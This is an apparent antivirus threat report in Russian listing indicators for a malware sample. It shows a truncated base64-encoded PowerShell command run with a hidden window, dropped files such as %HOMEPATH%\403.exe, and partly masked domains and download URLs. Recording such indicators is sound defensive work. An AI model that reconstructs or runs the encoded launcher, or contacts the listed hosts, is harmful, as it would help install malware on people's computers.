Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAFUAQQBaAF8AawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjACcALAAnAEEAYwBBACcAKQAsACcAQQAnACkALAAnAE4AJwApADsAJAB1AEIAQQBBAG8AQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\933291.cvr
- %HOMEPATH%\403.exe
- 'ta###rma.com':80
- 'si####tecplc.com':80
- 'ea###eti.com':80
- http://ta###rma.com/dovij7lgjd/ki_oD/
- http://ea###eti.com/wp-content/o_qO/
- DNS ASK ta###rma.com
- DNS ASK si####tecplc.com
- DNS ASK se###cii.com
- DNS ASK vv##88.ru
- DNS ASK ea###eti.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAFUAQQBaAF8AawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjACcALAAnAEEAYwBBACcAKQAsACcAQQAnACkALAAnAE4AJwApADsAJAB1AEIAQQBBAG8AQ...' (со скрытым окном)